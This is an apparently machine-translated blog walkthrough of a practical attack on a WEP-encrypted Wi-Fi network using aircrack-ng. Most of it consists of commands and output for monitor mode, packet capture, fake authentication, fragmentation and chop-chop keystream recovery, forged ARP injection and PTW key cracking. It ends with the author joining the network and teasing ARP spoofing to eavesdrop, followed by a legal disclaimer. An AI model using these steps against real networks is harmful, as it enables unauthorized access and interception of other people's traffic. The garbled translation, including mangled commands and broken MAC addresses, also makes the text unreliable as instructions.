11:26 Practical attack on the wireless network with wep encryption | |
Theory and process of the attack is well described in the user n3m0 articles "Attacks on wireless networks." But in practice there is described fairly weak. This article will describe the practical process of an attack on a wireless network with encryption, WEP, using the package aircrack-ng and operating system OpenSuse. SoftwareThis package is in the repositories of virtually all running GNU / Linux. There is a port of a Windows version, however, due to better driver support in Linux, has been chosen precisely this operating system. Installation # zypper in aircrack-ng After installation, the question arose with the hardware. Namely - the built-in notebook Wi-Fi adapter categorically refused to communicate with a point due to the low signal level. As a result - was taken by USB-adapter TrendNet TEW-424UB. # Lsusb | grep Net Bus 001 Device 002: ID 0bda: 8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter adapter driver wonderful support airodump, aireplay and did not have to apply the patch for mac80211. Link to the driver compatibility dmesg tells us that the auto adapter is not risen, but we actually do not have to: [2609.580074] rtl8187: Customer ID is 0x00 [2609.580144] Registered led device: rtl8187-phy1:: tx [2609.580171] Registered led device: rtl8187-phy1:: rx [2617.830502] ADDRCONF (NETDEV_UP): wlan0: link is not ready Scanning range Run the adapter into monitor mode. # Airmon-ng start wlan0 Interface Chipset Driver eth1 Intel 2200BG ipw2200 wlan0 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) Hacking is engaged in a virtual adapter mon0. The original adapter is still is in management. # Iwconfig wlan0 wlan0 IEEE 802.11bg ESSID: "" Mode: Managed Frequency: 2.412 GHz Access Point: Not-Associated # iwconfig mon0 mon0 IEEE 802.11 bg Mode: Monitor Frequency: 2.412 GHz Tx-Power = 20 dBm Now run a scan for available wireless networks. # Airodump-ng mon0 The fields in the client have the following meanings:
We will try to find vulnerabilities in the network ESSID. As can be seen - it is a 6 channel. You can simply specify the-c option 6 for airodump-ng, but for learning extinguish adapter and forcibly put it on Channel 6: # airmon-ng stop mon0 mon0 RTL8187 rtl8187 - [phy1] (removed) # airmon-ng start wlan0 6 wlan0 RTL8187 rtl8187 - [phy1] (monitor mode enabled on mon0) Due to the fact that the channels Wi-Fi networks overlap and configured on a specific channel, we will get and the neighboring access points, expose forced to use only a specific frequency and do filtering by BSSID. Parameter-w is enabled to write captured data. # Airodump-ng-c 6 - bssid 00:1 B: 11: E7: DD: D5-w essid.out mon0 Then you can either sit and wait until a sufficient amount of data packets and go directly to the selection key, or use an active attack. Active attacks. Firstly to check that the point of seeing our packages and drivers support all the functions you can try to authenticate to the point. If the client is not authenticated - that point will not take his packages. Try to authenticate: # aireplay-ng -1 0-e ESSID mon0 No source MAC (-h) specified. Using the device MAC (00:14: D1: 30:7 F: 46) 19:30:28 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1 B: 11 : E7: DD: D5 "to given ESSID" ESSID ". 19:30:28 Sending Authentication Request (Open System) [ACK] 19:30:28 Authentication successful 19:30:28 Sending Association Request [ACK] 19 : 30:28 Association successful :-) (AID: 1) At the same time to test the injection. # Aireplay-ng -9-e ESSID mon0 19:31:35 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1 B: 11: E7: DD: D5 "to given ESSID" ESSID ". 19:31:35 Trying broadcast probe requests ... 19:31:35 Injection is working! 19:31:36 Found 1 AP 19:31:36 Trying directed probe requests ... 19:31:36 00:1 B: 11: E7: DD: D5 - channel: 6 - 'ESSID' 19:31:37 Ping (min / avg / max): 0.771ms/6.558 ms/11.080ms Power: -48.50 19:31:37 30/30: 100% successfully. Hence we can use for a given point active attacks. Deassotsiirovat existing customer is often not worth it - you can open the fact of attack. Therefore, we will use the fragmentation attack. # Aireplay-ng -5-b 00:1 B: 11: E7: DD: D5 mon0 No source MAC (-h) specified. Using the device MAC (00:14: D1: 30:7 F: 46) 19:37:26 Waiting for beacon frame (BSSID: 00:1 B: 11: E7: DD: D5) on channel 6 19:37:26 Waiting for a data packet ... Read 362 packets ... It makes sense that if a point has at least a minimum functional, then it is a CAM table and come to us broadcast packet Size: 277, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1 B: 11: E7: DD: D5 Dest. MAC = FF: FF: FF: FF: FF: FF Source MAC = 00:22:43:01: C6: 7F 0x0000: 0842 0000 ffff ffff ffff 001b 11e7 ddd5. B. .. ........... 0x0010: 0022 4301 c67f 8009 3a1f 0000 0eb0 723b. "C. ...:..... r; 0x0020: c25a 0453 0691 4365 0afa 5ae3 c309 9094. ZS ... Z. Ce .... 0x0030: b0f9 90a9 65bf 1785 9f0a 65fa ba5a cb7d .... e. .... e.. Z.} 0x0040: f357 7167 c133 1efd ca2e 4ec9 9133 ea20. Wqg.3 .... N. .3. 0x0050: e508 c7af fce3 bbf3 599d c4a9 e01d 5e4f ........ Y. ....^ O 0x0060: 88e8 9997 a5ef 3f0f 058f 3c8a 100f d667 ......?...<.... g 0x0070: 2f0f 9f47 a3b0 f4cd 25f8 2cd4 af9e 157c / .. G. ...%.,.. .. | 0x0080: c456 5232 6903 eb5b e935 5dd2 9816 f94c. VR2i .. [.5 ].... L 0x0090: 18ab ea4c aabd 11ed 41a3 88c9 a5ac 726c ... L.. .. A. .... rl 0x00a0: 3b81 024c 5cfe 24d9 78a5 339b 02aa e147; .. L \. $. x.3 .... G 0x00b0: eeb2 512c 1d52 aaa0 2992 88a7 be2a cd6d .. Q,. R. .)....*. m 0x00c0: ab44 3248 619c 2402 8cda 621e ed9c 9109. D2Ha .$... b. .... 0x00d0: 62e9 23f7 be38 5f6f bfc9 da45 310a 6957 b. # .. 8_o ... E1.iW --- CUT --- Use this packet? Y Saving chosen packet in replay_src-0427 -193751.cap 19:38:22 Data packet found! 19:38:22 Sending fragmented packet 19:38:23 No answer, repeating ... 19 : 38:23 Trying a LLC NULL packet 19:38:23 Sending fragmented packet 19:38:25 Not enough acks, repeating ... 19:38:25 Trying a LLC NULL packet 19:38:25 Sending fragmented packet 19:38:27 No answer, repeating ... 19:38:27 Sending fragmented packet 19:38: 27 Got RELAYED packet!! 19:38:27 Trying to get 384 bytes of a keystream 19:38:27 Not enough acks, repeating ... 19:38:27 Trying to get 384 bytes of a keystream 19:38:28 No answer, repeating ... 19:38:28 Trying to get 384 bytes of a keystream 19:38:28 Trying a LLC NULL packet 19:38:28 Not enough acks, repeating ... 19:38:28 Trying to get 384 bytes of a keystream 19:38:28 Trying a LLC NULL packet 19:38:30 No answer, repeating ... 19:38:30 Trying to get 384 bytes of a keystream 19:38:30 Got RELAYED packet!! 19:38:30 Trying to get 1500 bytes of a keystream 19:38:30 Got RELAYED packet!! Saving keystream in fragment-0427-193830.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream The point of support fragmentation attack. If this attack is not supported - try to use the method proposed korak'om called chop-chop. # aireplay-ng -4-e ESSID mon0 19:42:08 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1 B: 11: E7: DD: D5" to given ESSID "ESSID". Read 182 packets ... Size: 86, FromDS: 1, ToDS: 0 (WEP) ..... Use this packet? y Saving chosen packet in replay_src-0427-194221.cap Offset 85 (0% done) | xor = D5 | pt = BF | 838 frames written in 14259ms Offset 84 (1% done) | xor = 9B | pt = 57 | 1293 frames written in 21971ms Offset 83 (3% done) | xor = 92 | pt = A8 | 2567 frames written in 43637ms ?? You can see how much time I have a selection of higher time site due to the low signal to the point. From the site aircrack: Offset 85 (0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms Offset 84 (1% done) | xor = EB | pt = 55 | 166 frames written in 498ms Offset 83 (3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms As a result of using both methods, we obtain xor-file, which contains the PRGA (pseudo random generation algorithm). Now we can make a fake arp-request and use it to dial the required number of data packets. # packetforge-ng -0-a 00 : 1B: 11: E7: DD: D5-h 00:09:5 B: EC: EE: F2-k 255.255.255.255-l 255.255.255.255-y fragment-0427-193830.xor-w arp-request Wrote packet to: arp-request Now send the packet to the network. # aireplay-ng -2-r arp-request mon0 No source MAC (-h) specified. Using the device MAC (00:14: D1: 30:7 F: 46) Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:1 B: 11: E7: DD: D5 Dest. MAC = FF: FF: FF: FF: FF: FF Source MAC = 00:09:5 B: EC: EE: F2 0x0000: 0841 0201 001b 11e7 ddd5 0009 5bec eef2. A. .........[... 0x0010: ffff ffff ffff 8001 471f 0000 548b 4dde ........ G. .. TM 0x0020: 5747 3254 b5ff 7b7d b389 dbe9 7a9e 389c WG2T ..{}.... z.8. 0x0030: ce3e 85a3 384f 2858 8532 b612 b57e f3ad.> .. 8O (X. .. 2. ~. . 0x0040: 420c 26b8 B. &. Use this packet? y Saving chosen packet in replay_src-0427-195956.cap You should also start airodump-ng to capture replies. Sent 1301 packets ... (500 pps) This should dramatically increase the number of received data packets from the point. I have not grown. Strange. Let's performance injections # aireplay- ng -9-e ESSID mon0 20:02:47 Waiting for beacon frame (ESSID: ESSID) on channel 6 Found BSSID "00:1 B: 11: E7: DD: D5" to given ESSID "ESSID". 20:02:47 Trying broadcast probe requests ... 20:02:48 Injection is working! 20:02:48 Found 1 AP 20 : 02:48 Trying directed probe requests ... 20:02:48 00:1 B: 11: E7: DD: D5 - channel: 6 - 'ESSID' 20:02:49 Ping ( min / avg / max): 0.796ms/6.685ms/10.849ms Power: -48.67 20:02:49 27/30: 90% works. Let's try to remake the arp-request, so it came as a -be of a real network. Typically, users leave default address 192.168.1.1/24. We use this address as the respondent. At the same time restart airodump # packetforge-ng -0-a 00:1 B: 11: E7: DD: D5 -h 00:09:5 B: EC: EE: F2-k 192.168.1.1-l 192.168.1.250-y fragment-0427-193830.xor-w arp-request1 Wrote packet to: arp-request1 # aireplay-ng -2-r arp-request1 mon0 ....... Sent 799 packets ... (499 pps) Now working. Number of received packets under 300 per second. Less than 3 minutes 30,000 data packets. Let's try to pick up the key. # aircrack-ng essid.out-0 *. cap Opening essid.out-01.cap Opening essid.out -02.cap Reading packets, please wait ... Attack will be restarted every 5000 captured ivs. Starting PTW attack with 37621 ivs. KEY FOUND! [51: 81:82:41:07] Decrypted correctly: 100% hammering the key to the client. Cheers, joined. Now you can do arp-spoofing and listen to the traffic - but that's for another article. This information is for reference only. The author reminds you of Article 272 of the Criminal Code "Illegal access to computer information» | |
|
Total comments: 0 | |